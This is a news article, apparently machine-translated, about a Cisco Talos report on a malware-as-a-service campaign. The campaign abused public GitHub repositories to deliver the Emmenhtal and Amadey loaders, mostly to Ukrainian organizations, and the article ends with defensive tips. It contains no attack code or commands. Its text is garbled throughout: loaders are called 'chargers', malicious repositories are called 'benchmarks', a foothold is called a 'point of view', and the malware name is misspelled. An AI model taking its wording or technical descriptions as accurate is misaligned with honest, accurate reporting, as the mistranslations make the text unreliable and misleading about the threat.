- Github is under armament in the form of malware infrastructure, warns the report
- Emmenhtal and Amadey are part of a coordinated and multilayer attack chain
- Victims are mainly Ukrainian organizations, but all Github users should be on their care
Security researchers have discovered a sophisticated operation of malicious software as a service (MAAS) which operates GitHub public standards to compromise its objectives.
In a blog article, Cisco Talos said that threat actors have evolved their delivery tactics, moving away from traditional phishing methods and in Github, which is often on the white list in corporate environments.
GitHub is an extremely popular platform in the open source world, and as such is under a constant attack dam. This batch of malicious benchmarks has been deleted, as are countless before him.
How to defend yourself against GitHub original attacks
The campaign sought to deliver two families of malicious software – Emementhal and Amadey – mainly to organizations in Ukraine.
Emementhal is a malware charger that usually drops Smokeloader, another charger. Although a charger loader of a charger does not sound at the start of logical, there is a strategic logic behind.
Emmenhtal is designed as a furtive several stages downloader which excels in initial infection and escape. Once the point of view is set, it retains the next phase of the Smokeloader attack, which is a modular charger rich in functionalities specializing in post-infection operations.
Amadey, on the other hand, is a botnet that was spotted for the first time around 2018, mainly sold on Russian -speaking cybercrime forums. It acts as a modular downloader and a system profiler, capable of providing a wide range of malware, including information thieves and ransomware.
In this campaign, Amadey was hosted on GitHub and disguised in various ways, such as an MP4 file, or integrated into Python scripts like “Checkbalance.py”.
To defend themselves against this, and other threats like this, companies should apply a strict filtering for attachments based on scripts, keep an attentive eye on the execution of PowerShell and examine Github policies, as far as possible.
They should also opt for in-depth and behavioral defense monitoring, as these can help identify shaded download models or useful loads executed on targeted machines.
